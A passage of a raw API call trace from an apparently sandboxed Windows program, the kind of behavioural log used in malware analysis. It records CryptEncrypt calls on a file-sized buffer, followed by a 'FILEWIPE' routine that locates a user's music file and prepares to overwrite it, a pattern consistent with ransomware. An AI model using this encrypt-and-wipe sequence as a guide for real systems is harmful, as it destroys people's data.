hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.735] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.735] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.735] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.736] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.736] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.736] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.758] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.758] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.759] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf5b7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf5c0) returned 1 [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] CharLowerBuffW (in: lpsz="byte[62913]", cchLength=0xb | out: lpsz="byte[62913]") returned 0xb [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.760] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.760] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6e5c8*, pdwDataLen=0x87e820*=0xf5b7, dwBufLen=0xf5c0 | out: pbData=0xa6e5c8*, pdwDataLen=0x87e820*=0xf5c0) returned 1 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.760] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.760] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.760] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.760] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.761] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.761] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.761] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.761] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.761] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.761] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.770] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0185.770] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.770] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0185.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.770] CryptDestroyKey (hKey=0x90aed8) returned 1 [0185.770] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.771] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.771] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.771] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.771] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.771] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.771] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.771] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0185.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.771] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.772] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.772] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.772] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0185.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.772] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.772] FreeLibrary (hLibModule=0x74f20000) returned 1 [0185.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.773] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.776] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.776] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0185.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0x90af58 [0185.777] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.777] CharLowerBuffW (in: lpsz="byte[62903]", cchLength=0xb | out: lpsz="byte[62903]") returned 0xb [0185.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.778] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0185.778] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.778] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0185.778] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0185.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0185.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.779] FreeLibrary (hLibModule=0x75c90000) returned 1 [0185.779] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.779] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.779] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.779] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0185.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] 